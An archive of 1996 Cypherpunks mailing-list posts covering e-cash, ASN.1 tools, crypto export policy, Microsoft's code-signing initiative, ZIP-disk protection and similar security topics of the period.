> >122 East 1700 South
> >Provo UT 84606
> >USA
> >
> >Tel  801 429-3348
> >Fax. 801 429-3500
> 
> I've recently been looking into this as well. I haven't looked at ISODE
> yet. Snacc looks reasonable, but can't handle big integers (> 2^32), which
> may make it hard to use for certificates, due to embedded RSA keys; I
> haven't yet checked to see what could be done about this. It's free; the
> compiler is under the GNU license, but the runtime is redistributable
> without fee or onerous restriction.
> 
> I also spoke to a company in NJ, Open Systems Solutions (609.987.9073), but
> their licensing terms were too expensive for my purposes. Their product
> runs on a lot of platforms and sounds very complete, but requires a
> licensed run-time environment. They currently support C and Pascal; C++ is
> coming. Their development environment starts at $11,500.
> 
> I'm also searching for an ASN.1 product. We can afford to pay for a
> compiler, but we need unrestrained distribution of the runtime in source
> form. Any information would be greatly appreciated.
> 
> You may wish to examine the ASN.1 homepage @:
>          http://www.inria.fr/rodeo/personnel/hoschka/asn1.html
> 
> Best,
>  - Tim
> 
> Tim Dierks - Software Haruspex - tim@dierks.org
> Hastening the heat-death of the universe since 1968.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 23 Mar 1996 02:09:04 +0800
To: Gary Lee Jeffers <gjeffers@ns.htc.net>
Subject: Re: (X:x)e$ 's other use
In-Reply-To: <9603220839.AA14552@ns.htc.net>
Message-ID: <199603221506.KAA23445@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I won't enumerate all the economic and technical errors in this
message; they are numerous and this isn't the correct forum. It is my
personal hope that free banking (that is, competitive currency issue
by banks without regulation) will some day again be the rule as it
once was, and that electronic mechanisms will be a portion of the way
that currency works under a free banking system. However, that does
not mean that fractional reserve banking (which isn't even what the
Fed does), debt currency (all notes are debt currency), etc. are
wrong, or that the Fed is a private organization. I'll happily discuss
this in private mail if anyone wishes.

Cryptographically secured electronic money does, of course, provide
the promise to have banks, especially ones outside of the
U.S. regulatory regime, issue their own money and have it freely
circulate even in places like, say, China, or the U.S., where such
money might not be technically legal. However, to do that, it will be
necessary for some financial institution that people have substantial
confidence in to fill this role. Money is partially about trust, and
cryptography can only go so far in convincing people that their
savings are secure. Even encrypted "open books" protocols like the
ones Eric Hughes has proposed can only go so far in preventing
systematic frauds.

Perry

Gary Lee Jeffers writes:
>                     (X=:x)e$ 's other use.
> 
> My dear fellow Cypherpunks,
> 
>    I believe that secret e$'s other use has been overlooked: That is,
> e$ would be a sound money replacement for the corrupt currency that
> every large state in the world currently pushes. Especially if e$
> can be redeemed in something of real value on demand.
> 
>    As some of us know, the U.S. Fed State's Federal Reserve Notes are
> corrupt currency. The corruption is at 5 different levels:
> 
> 1. They are DEBT currency - they are lent into existence and it is
> mathematically impossible to pay off this debt. If you borrow $100, then
> where do you get the interest - say 8% since all FRN's are borrowed into
> existence?. This turns the great majority of Americans into victims. If
> you want freedom for your citizens, you do NOT allow monopoly DEBT
> currency. Note: bankruptcies & good counterfeiting are the only ways.
> 
> 2. Fractional Reserve Banking. That means that the bank can lend out
> several times the money that it actually has. I believe that that is
currently 8 times but that is a rough estimation.
> 
> 3. Fiat money. That means that FRN's are backed by nothing more than the
> willingness of banks to redeem them with other FRN's.
> 
> 4. Private banks with monopoloy privledges issue the currency. The
> Federal Reserve is a private (non-U.S. State) institution with the mono-
> poly on U.S. currency manufacture. The U.S. Treasury prints the currency
> for the Federal Reserve. Other major states have similar arrangements. These
> major banks are properly called Central Banks. To turn your currency
> ownership over to a private Central Bank is monstrous! If the people
> knew what was going on, the U.S. Federal State would be destroyed along
> with the hidden ruling class.
> 
> 5. The Legal Tender Laws. These laws force the acceptance of FRN's
> in the U.S.. "This money good for all debts public and private".
> 
>    Note that the book DREAMS COME DUE made the distinction between money
> and currency. The author used the word money for real money and the word
> currency for false money. It may be the author's private distinction.
> 
>     I suggest that Iran did us a good turn in making and passing billions
> of dollars worth of uncatchable hundred dollar bills: they allowed the
> retirement of billions of dollars of debt for the American people without
> forcing Americans into bankruptcy. In a debt currency economy, good count-
> terfeiting is GOOD! It adds superior counterfeit to the mass of "legiti-
> mate" counterfeit. kind of improves the pool :-)
> 
>    Secret e$ offers the possibility of ridding ourselves of the slavery
> of private monopoly money issue. It would also give us a choice in what
> currency that we would like to use. Another possibility is that due to its
> high quality, it would be used during depressions and would possibly
> even break depressions. Its extremely FLUID nature might also be a pro-
> tection against depressions. It would be a TRUE MONEY and would give the
> people the advantages of true money. Let me emphasize: we do not current-
> ly have REAL money nor do the people of the other major States. We do not
> know what real money is like.
> 
>    Another possibility exists with secret e$: that several different kinds
> could exist. They would all be convertible into each other, of course.
> Major differences?: Different redeemablity schemes, etc..
> 
>    Secret e$ offers more that just the freedom of private transactions
> (as great as that is). It also offers us the power and freedom of true
> money!
> 
> 
> 
> Central power is stolen freedom.
> THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY.
> The United States "Federal" Government - We'll be even more American
> without it.
> 
>                                            PUSH EM BACK! PUSH EM BACK!
>                                            WWWAAAYYYY  BBBAAACCCCK!
>                                            BBBEEEAAATTTT  STATE!
> 
>                                            Gary Jeffers
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sat, 23 Mar 1996 02:27:55 +0800
To: cypherpunks@toad.com
Subject: executable e-$ code for DOS
Message-ID: <9603221544.AB04541@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi. 

I would like to toy around with a e-cash program.  I got Magic Money but 
it is only sources and I have no compiler.  Is there a location I where
I can get the executables for DOS?

I want to do nothing serious with it, so the security aspect of pre-compiled
code does not bother me too much.

Thanks

JFA

 Public Key at http://w3.citenet.net/users/jf_avon
    Jean-Francois Avon <jf_avon@citenet.net> 
    2048 bits key ID:C58ADD0D  1996/03/01    
fingerprint=52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 23 Mar 1996 02:18:23 +0800
To: weinberg@accessus.net (WThinker)
Subject: Re: LET'S ROCK!!!!
In-Reply-To: <199603221326.HAA22835@mtvernon1.accessus.net>
Message-ID: <199603221537.KAA23507@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



WThinker writes:
> Ok, here is the situation.  I have a person mad at me in one of my mailing
> lists.  Turns out, this person was the owner of the mailing list!  Well now
> I'm stuck, knocked out of the list.  The owner can not see any of my mail,
> no matter how hard I try.  I need some ideas to eather get through to her,
> or really fuck up the mailing list.
> 
> Any ideas?

1) Learn to spell.
2) Figure out what the cypherpunks mailing list is for; you don't seem
   to know.
3) I will point out that deliberately trying to disable or sabotage a
   computer on the net is a federal crime, and that you are probably
   currently engaging in conspiracy to do so.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 23 Mar 1996 06:08:08 +0800
To: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies QC Canada))
Subject: Re: executable e-$ code for DOS
In-Reply-To: <9603221544.AB04541@cti02.citenet.net>
Message-ID: <199603221839.KAA29330@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


jf_avon@citenet.net (Jean-Francois Avon) writes:

 > I would like to toy around with a e-cash program.  I got
 > Magic Money but it is only sources and I have no compiler.
 > Is there a location I where I can get the executables for
 > DOS?

 > I want to do nothing serious with it, so the security
 > aspect of pre-compiled code does not bother me too much.

I compiled Magic Money and ran a bank through my Netcom account
when the software first came out.  The coins were called "Tacky
Tokens" and had no monetary value.

The compiled DOS binaries for the client and server are still
sitting in my FTP dir if anyone wants to grab them.  Please don't
expect me to process any new transactions for "Tacky Tokens", but
feel free to grab the software and play with it all you want.

       ftp:/ftp.netcom.com/pub/mp/mpd/mgmnyexe.zip

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 23 Mar 1996 18:47:10 +0800
To: jmoll@acquion.com (Joseph L. Moll)
Subject: Re: protection on IoMega ZIP drives
In-Reply-To: <2.2.32.19960322120637.006acd68@mail.acquion.com>
Message-ID: <199603221552.KAA16944@homeport.org>
MIME-Version: 1.0
Content-Type: text


Joseph L. Moll wrote:
| 
| Anyone have any idea how secure the ZIP disk is once it is "protected?"  I
| know that the disk will refuse to be mounted without the passkey, but what
| is really happening here?

	Its weak software encryption.  Paul Kocher announced he had
cracked it in Sept/Oct, but is not distributing the crack program.

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Sat, 23 Mar 1996 04:09:56 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Microchip Technologies and Nanoteq
Message-ID: <Pine.HPP.3.91.960322111544.14374D-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


Microchip Technologies, the "PIC" people, according to the grapevine is 
introducing smart card products apparently based upon Nanoteq's 
algorithm's.  Microchip calls it "Keeloq Code Hopping". Bruce Schneier's 
short description of the Nanoteq algorithm (p 390 2nd edition Applied 
Crypto ) is not too favorable. I'm not sure how code hopping interacts or 
is used in the system.  

Can anybody shed further light on this subject and the viability of this
cryptographic system?  

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation or government agency>."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cs.berkeley.edu>
Date: Sat, 23 Mar 1996 08:00:35 +0800
To: cypherpunks@toad.com
Subject: Re: Ecash API about to be released
In-Reply-To: <v02120d05ad77f85bc667@[192.0.2.1]>
Message-ID: <31530BB5.61952101@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> 
> With the Ecash API due to be released within a matter of days, I would
> welcome anyone on this list interested in building applications on top of
> such an API to contact me. The API will determine the calls to a libecash
> that DigiCash will provide.
> 
> Try to send emails that contain "I would like to code..." and please don't
> send the ones that contain "it would be nice if someone coded..."
> 
By this, do you mean that just the API will be released (which we had
pretty much finalized in mid-January), or actual code to go with it?

They've had far too much time to add wrappers to their existing ecash
client to turn it into a library.  I hope that (very soon) we see a
properly-implemented libecash; however, that's unlikely, since no one
has discussed a low-level API yet...

   - Ian "I'll write it, if someone can get around these **** INS
           problems..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Fri, 22 Mar 1996 18:20:42 +0800
To: Frederick Zarndt <frederick_zarndt@novell.com>
Subject: Re: ASN.1 Tools/Compilers
In-Reply-To: <s1512f9a.073@fromGW>
Message-ID: <Pine.SOL.3.91.960322125615.14909B-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Mar 1996, Frederick Zarndt wrote:
> Does anyone know of reliable ASN.1 tools/compilers suitable for use on a
> wide range platforms?

SSLeay contains a program asn1parse that will decompose ASN.1 structures.
It also has C routines to play with X509, CRL and certificate requests.
I did not write an ASN.1 compiler, I have written direct C code (using 
macros).  I decided it would be easier that writing a compiler but it 
has probably worked out about the same amount of effort.

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 23 Mar 1996 21:57:23 +0800
To: cypherpunks@toad.com
Subject: Forward: Essay: Political-economy of the Internet
Message-ID: <199603222230.OAA16205@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Thu, 21 Mar 1996 13:40:53 -0800 (PST)
From: "Michael Strangelove" <michael@strangelove.com>
To: Multiple recipients of list <cda96-l@willamette.edu>
Subject: Essay: Political-economy of the Internet

Here are the first few paragraphs from an essay on the relationship
between of freedom of speech on the Net and the "statehood" of
cyberspace. I am trying to define the role of values (ethics) in the
new culture of online speech and am searching for sources/theories
that will help explain the new value system of the Net within the
larger context of global media culture. 

For the complete text of this essay, send the command GET POLITICS in
the SUBJECT line of an e-mail message to Michael@Strangelove.Com

Michael Strangelove

The Political Economy of the Internet
(Previously published in The Internet Business Journal,
http://www.phoenix.ca/sie) -- Revised -- March 12, 1996

Copyright (C) 1996, Michael Strangelove. All Rights Reserved.
Comments to the author at Michael@Strangelove.Com
This document may be forwarded and archived on the Internet, so long
as no changes are made to the text,

Publishers take note, this draft is part of a book on freedom and
speech and the Internet which I am working on -- contact
michael@strangelove.com for table of contents (for publishers only).

Introduction

"There is a growing concern that the very existence of the Internet is
a threat to the nation-state" (Globe and Mail, Feb 3/96, p. A1).

Recently, the headline "Nations see Internet as threat to security"
appeared on the front page of Canada's national daily newspaper, The
Globe and Mail. Consider for a moment that more than two decades after
its "invention" and three years after its integration into popular
culture and the business process, the Internet has distinguished
itself on two fronts. It remains the only mass media system to escape
monopolistic ownership by media conglomerates (with no sign of this
changing) and it is increasingly seen, correctly, as a threat to
national security and sovereignty. Meanwhile, the business community
throughout the world is gradually integrating the Internet into the
core of its communication and marketing infrastructure. The inevitable
outcome of these trends is that the communication infrastructure
(including marketing, customer service, and financial transactions) of
the business community is destined to conflict with the information
policies of governments. One way of looking at the Internet is to
understand it as an emerging nation-state, a state that, with each
passing day, becomes more entwined with the fabric of the geo-
political balance of power. The corporate world, particularly
multinational corporations, and governments are soon going to have to
come to terms with the statehood of the Internet.

Political theorist Anthony Giddons writes that "significant power,
within any type of organization, consists in the capacity to determine
or shape policy." This understanding of power -- policy making -- is
one that any manager, executive, or bureaucrat can certainly
appreciate. Power-as-policy-making sheds light on the type of power
the Net, (and more comprehensively, cyberspace,) wields. More
precisely, the statehood of the Net is founded on its power to deny
existing nations any concrete method to exercise direct, unilateral
influence over the "policy" of the Internet. 

It is quite clear that, congressional saber-rattling aside, no nation
has successfully legislated the information policy of the Internet. As
a landless nation-state, the Net's constitution, or bill of rights, is
its internal information policy -- no one group, community, ideology
or nation is universally recognized to have the right to determine
what values, art forms, beliefs, or private thoughts can or cannot be
expressed on the Net. While this information policy is framed by pre-
existing international treaties concerning copyright, thus far this
unwritten but very real policy has not been further defined or amended
by any individual nation's internal moral standards or legislature.
Bear in mind that no significant content has ever been removed from
the Net as a result of any one nation's information-policy making
process. Indeed, just the opposite is the case -- every attempt at
censoring content on the Net has lead to increased exposure of the
censored or banned content and its further proliferation throughout
the Net. 

Admittedly, it is theoretically possible for a government to censor
material on Internet servers within its borders. Yet all previous
attempts at doing so have simply resulted in the censored material
migrating to the Net servers of other nations and remaining accessible
via the Net to all. The dynamic of regional censorship being
undermined by the international Net community is now almost a daily
occurrence. This "end of censorship" in the international information
sphere is not threatened by the possibility of a global information
policy trade agreement on censorship. Any attempt to impose the
freedom of speech standards of one nation on another will certainly be
interpreted as a violation of national sovereignty.

As a new form of borderless state, Cspace (Internet/cyberspace) has
demonstrated sovereign power over its internal information policy. The
front pages of newspapers around the world are demonstrating a growing
awareness of this new political animal. But neither the global body
politic nor the corporate realm have come to terms with the extent of
the Net's sovereignty and the future impact of this "new wired world
order". 

For the complete text of this essay, send the command GET POLITICS in
the SUBJECT line of an e-mail message to Michael@Strangelove.Com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 23 Mar 1996 21:57:58 +0800
To: cypherpunks@toad.com
Subject: Re: Dorothy Denning attacks Leahy's crypto bill
Message-ID: <199603222230.OAA16208@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:33 PM 3/21/96 -0800, Bill Stewart wrote:
>>From: denning@cs.cosc.georgetown.edu (Dorothy Denning)
>>>The Commerce/NSA study did acknowledge that the existence of foreign
>>>products claiming strong encryption could have a negative effect on
>>>U.S. competitiveness.  However, by allowing encryption services to be
>>>sold separately from the applications software that uses them, CAPIs
>>>will make it extremely unlikely that general-purpose software will be
>>>substantially effected by export controls.
>
>Which side is Dr. Denning _on_ here?  At present, software using CAPIs
>is not exportable under the ITAR, since the CAPI is a "component of a 
>munitions system"; is she now advocating legalized export of software
>using government-approved CAPIs only?  

Case in point.  I recently had a client ask me to locate a reference
implementation of SSL.  I fired up AltaVista and quickly found two of them.
 One was available thru Netscape, and the other was Eric Young's from
Australia.

Now, in good conscience, do I give them Netscape's non-exportable version,
or Eric's already exported version.  Of course I gave them Eric's.  They
were delighted since they can just point their foreign customers to Eric's
site and avoid the whole export issue.

I would like to publicly thank Eric for making his code available to US
sites.  I hope that this description, in some small way, helps to overcome
the idiocy of not being able to export what is already freely available
abroad.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Sat, 23 Mar 1996 07:28:25 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Ecash API about to be released
Message-ID: <v02140b00ad78b0525ef4@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


9:34 AM 3/22/96, jim bell:

> For obvious reasons, I am interested in ecash with full payee, as well as
> payer, anonymity.  Last I heard, Digicash didn't provide this.  Any updates?

        Finally setting up shop, eh? I can see your shingle already:

                   ------------------------------------
                  |                                    |
                  |   JIM "Yeah, THOSE Daltons" BELL   |
                  |                                    |
                  |   Anonymous Assassination Broker   |
                  |                                    |
                  |            "redefining             |
                  |           random violence          |
                  |             since 1996"            |
                   ------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 23 Mar 1996 21:56:59 +0800
To: cypherpunks@toad.com
Subject: Re: Thanks for the keys
Message-ID: <ad7864c6130210043e77@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:00 AM 3/22/96, whitfield.diffie@Eng.Sun.COM wrote:
>    I would like to thank the gentleman, who identified himself only
>as a cypherpunk, who fetched my keys out of the door of my wife's car
>(I frequently leave keys sticking in the doors of cars), knocked on
>the window, and handed them to me.

That anonymity was successfully preserved demonstates the perfect forward
secrecy of Diffie key exchange.

Or something like that.

--Tim "Not the Key Master" May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 23 Mar 1996 18:48:36 +0800
To: pfarrell@netcom.com
Subject: Summary of NIST GAK Meeting
Message-ID: <199603222049.PAA11327@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Pat,


We received today by snail mail from NIST a March 5 "Summary of 
the Proposed 64-bit Software Key Escrow Encryption Export 
Criteria Meeting" on December 5, five-pages,  "prepared by an 
outside observer from Martin Marietta Systems, Inc."


You've probably got a copy as well. If you've not already done 
so, and if you like, we'll be happy to scan it and send over 
for your Web site. Let us know.


John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stuart Theodore <stuartt@MICROSOFT.com>
Date: Sat, 23 Mar 1996 19:18:42 +0800
To: "'pdx-cypherpunks-l@teleport.com>
Subject: Digital Signature Inititiative
Message-ID: <c=US%a=_%p=msft%l=RED-76-MSG-960323000445Z-4522@red-07-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Good afternoon,

I am the program manager at Microsoft responsible for putting the
digital signature program in place.   I am sending this mail in response
to a recent mail string sent to these aliases appearing at the bottom. 

To summarize some important points of the program:

*  The program creates a certificate authority infrastructure which
consists of thrid party non-software affiliated companies such as
VeriSign and GTE who will act to grant certificates to allow code to be
signed.   The policies defining who can be a certificate authority and
what it means to be a trusted software publisher will be a matter of
public policy(standard).  The point being that Microsoft does NOT
control who can/cannot sign code.

*  This approach solves the problem of identity and integrity, and is
viewed by MS as complementary to the sandboxing approach used by Java
scripting, which we view to be incomplete and unsatisfactory by itself. 
We believe that Java needs to sign platform dependent Java classes in
addition to their sandboxing scheme.  

*  The W3C is creating a working group in this area to develop standards
around the policies mentioned in the first point, and the formats of the
certificate and signature formats.  Microsoft is committed to making
this a open, industry, x-platform standard...

* regarding the mac question - there already is a  version of Internet
Explorer for the Macintosh, available for download at
www.microsoft.com/ie. Microsoft is has already announced its committment
to building cross-platform internet products.

I would be happy to answer more questions you may have about this
program, inluding proving more information.

Stuart Theodore
Program Manager
Microsoft Corporation
Stuartt@microsoft.com



>I recieved a copy of "Microsoft Interactive Developer" today in the
>mail.
>In it, it has a preview of Microsoft Explorer 3.0. (Flux by David
>Boling on
>page 120.)
>
>Of interest to Cypherpunks is this paragraph (in the section on OLE
>support
>in web browsers):
>
>"Since OLE controls could potentially pose a security problem,
>Microsoft is
>studying how to create an infrastructure to certify them.  The idea is
>that,
>once certified, an OLE control would contain an RSA security signature
>indicating that it has passed muster -- the OLE eqivelent if the Good
>Housekeeping Seal of Approval! Users of Internet Explorer 3.0 could
>specify
>whether or not noncertified OLE controls should be loaded and executed
>by
>the browser."
>
>As a web developer, I have some problems with this scheme.  Giving
>Microsoft
>access to virtually every OLE control on the Web does not make me more
>secure.  Sounds like a way to rip off ideas from the rest of the
>development
>world.  If someone has a control that might compete with a Microsoft
>product, it could be shelved and/or delayed for "further security
>testing".
>
>Java has a decentralized mechanism for security.  No one group controls
>what
>is a "certified" control and what is not.  You write the code and
>compile it
>and that is that. Furthermore, you are not stuck with Microsoft
>approved
>platforms.  (I wonder if there will ever be a version of Explorer for
>the
>Mac.)
>
>I expect the Microsoft plan to garner a bit of resistance from the Web
>development community over this one...
>
>I do not expect to see many OLE crypto apps for the web with this plan.
>
>---
>Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
>        `finger -l alano@teleport.com` for PGP 2.6.2 key
>                http://www.teleport.com/~alano/
>  "We had to destroy the Internet in order to save it." - Sen. Exon
>
>
>
>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 23 Mar 1996 21:56:26 +0800
To: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Subject: Re: New Beta Test of PGPfone available WINDOWS '95 Included!
In-Reply-To: <199603222109.QAA22574@unix.asb.com>
Message-ID: <199603222210.RAA24083@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mutatis Mutantdis writes:
> Will there ever be a Win32s version of PGPfone?  I have one of those systems
> with non-(MS)DOS partitions that MS-DOS/Wind95 doesn't like, so until MS can
> deal with the fact that people use other OSs, I'm staying clean of Win95.

I run Win95 and other operating systems simultaneously. What is the
problem?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Sat, 23 Mar 1996 19:13:11 +0800
To: cypherpunks@toad.com
Subject: Re: NT's C2 rating
Message-ID: <199603222311.RAA09121@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


Regarding the comment:

>> Basically, I'm now questioning the C2 rating of Windows NT.  The 
>> entire security layer is  modular to the Kernel.  As a modular 
>> driver, it can be removed, rewritten, and replaced.   

C2 is no big deal. It means you have the typical security measures
that can be disabled or bypassed by a trojan horse. You're not doing
serious protection till you put in mandatory protections like what
appears in B or A level systems.

The big deal is that few vendors have tried to get NCSC evaluations.

Rick.
smith@sctc.com    secure computing corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 23 Mar 1996 14:20:52 +0800
To: pdx-cypherpunks-l@teleport.com
Subject: Re: Digital Signature Inititiative
Message-ID: <2.2.32.19960323011508.0092e328@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


I am glad to see this clarification on the signature policy.  (Sorry for the
paranoia, but I have reasons to be wary of plans made in Redmond...) 

The article that I quoted in the first post was quite misleading as to a
number of points.  (Which is why I should not believe things written in one
page articles, but that is another point...) With the author's credentials,
I would have expected a wee bit more accuracy (or clarity).

I do have a number of comments on what you posted, however...

At 04:04 PM 3/22/96 -0800, Stuart Theodore wrote:
>Good afternoon,
>
>I am the program manager at Microsoft responsible for putting the
>digital signature program in place.   I am sending this mail in response
>to a recent mail string sent to these aliases appearing at the bottom. 
>
>To summarize some important points of the program:
>
>*  The program creates a certificate authority infrastructure which
>consists of thrid party non-software affiliated companies such as
>VeriSign and GTE who will act to grant certificates to allow code to be
>signed.   The policies defining who can be a certificate authority and
>what it means to be a trusted software publisher will be a matter of
>public policy(standard).  The point being that Microsoft does NOT
>control who can/cannot sign code.

This is a good thing.  (This was clarified after I posted by a developer who
had returned from an MS developers conference on Internet Apps.) It is also
nice to see that there will be more than one option of signing services.
Hopefully the policies will not be such as to shut out the small,
independant web designers/developers.

>*  This approach solves the problem of identity and integrity, and is
>viewed by MS as complementary to the sandboxing approach used by Java
>scripting, which we view to be incomplete and unsatisfactory by itself. 
>We believe that Java needs to sign platform dependent Java classes in
>addition to their sandboxing scheme.  

Actually it protects against mallicious code (for the most part), but not
against badly designed code.  I can see where improperly tested and designed
code could cause problems on host machines.  I have not seen anything that
makes OLE code more secure (or more stable) in the real world environment.
(Just lots of paperwork being signed that says "We will not use these powers
for Evil".)

With Java, there has been alot of work to make the language less subject to
abuse.  I have not seen anything in that regards involving OLE.

>*  The W3C is creating a working group in this area to develop standards
>around the policies mentioned in the first point, and the formats of the
>certificate and signature formats.  Microsoft is committed to making
>this a open, industry, x-platform standard...

This is a good thing.  And I hope that they release them to the rest of the
world before implementing them and releasing in a bunch of MS products.
(This is one of my big beefs with Microsoft.  I have seen a number of cases
where APIs are released to developers MONTHS after they appear in Microsoft
products.  Not cool.)

>* regarding the mac question - there already is a  version of Internet
>Explorer for the Macintosh, available for download at
>www.microsoft.com/ie. Microsoft is has already announced its committment
>to building cross-platform internet products.

I am glad to hear it.  Before this thread i had not heard of a Mac version.
(Maybe it is becuase my friends who use the Mac have dropped using any
Microsoft products.  Come to think of it, it was because of how Word for the
Mac implemented OLE...  (Among other things.))

>I would be happy to answer more questions you may have about this
>program, inluding proving more information.

The part that interests me about the signing of executables is not for
distribution over the web.  (I beleive that OLE is not abuse proof enough
for that yet.)  What I would like to see is an API (or internal routines) to
allow the app to check the signature opon loading and perform checks to
detect tampering within the executable.  This I see as a very useful thing,
mpore so than the web applications.  Is such a thing planned?

Also, is there a web page that has additional information/plans about this API?
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wendigo@pobox.com
Date: Sat, 23 Mar 1996 19:18:37 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: New Encryption Software-Encrypt Image & Text Files (fwd)
Message-ID: <199603222241.RAA07882@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Thought y'all might find this interesting ... if not funny.


: Press Release from Antelope Productions, Inc
: 
: Subject:  New Encryption Software; Quick@Crypt
: 
: 
: Antelope Productions, Inc. is releasing our new encryption package
: called Quick@Crypt that has several advantages over any other
: encryption software available on the market.  Now more than ever,
: there is a need for security in transferring sensitive information
: through the Internet and networks worldwide.  There has not been a
: universal way for people to send all types of  files easily,
: inexpensively and securely through the Internet or networks UNTIL NOW.
:  All other encryption software available  on the market requires a
: separate license for each site (the sender as well as the receiver). 
: With Quick@Crypt you may freely distribute the decryption program. 
: Only the encryption side requires a licensed copy of Quick@Crypt. 
: There is also no limit on the password size and there is no
: restriction on overseas use.
: 
: You will find pricing of  Quick@Crypt a real bargain, given the
: pricing and functionality compared to other available encryption
: packages.  Our price is only $99.95  plus $5 shipping in US plus state
: sales tax in Texas, New Jersey and Florida.  Quantity discounts are
: also available.
: 
: Installation is performed easily on any Windows or Windows 95 system. 
: Memory requirements with as little of 2 MB of RAM (I tried it on a
: Tandy portable with 2 MB!).   We also have a version to work in DOS. 
: There is a floating toolbar that always remains on top of your current
: open window.  Quick@Crypt's floating toolbar gives you  four options.
: 1. Encryption-You have a user friendly screen to select the drive,
: directory and files that you want to encrypt.  Chosen files for
: encryption  are grouped together and compiled into a single executable
: file with an assigned password you enter.  There is  no limitation on
: the password size. Overseas distribution of the encrypted files is not
: restricted.  File encryption often takes less then ten seconds. 2.
: Decryption- Allows you to select the drive, directory and file you
: want to decrypt.  The password is requested once you select the
: encrypted file.  Decryption is performed in Windows or Windows 95 with
: the freely distributed  decryption module.  Decryption module is sent
: to each receiver with no licensing requirement.  Decryption of the
: executable file may also be performed at the DOS prompt with no
: additional software. 3. Help- A user friendly system for all of
: Quick@Crypt's functions, along with an index and glossary. 4.    Exit
: 
: For more information, wholesale quotations,  or ordering, please email
: your requests to schek@airmail.net (Walter Chek), Subject: Quick@Crypt
:  < Inquiry>
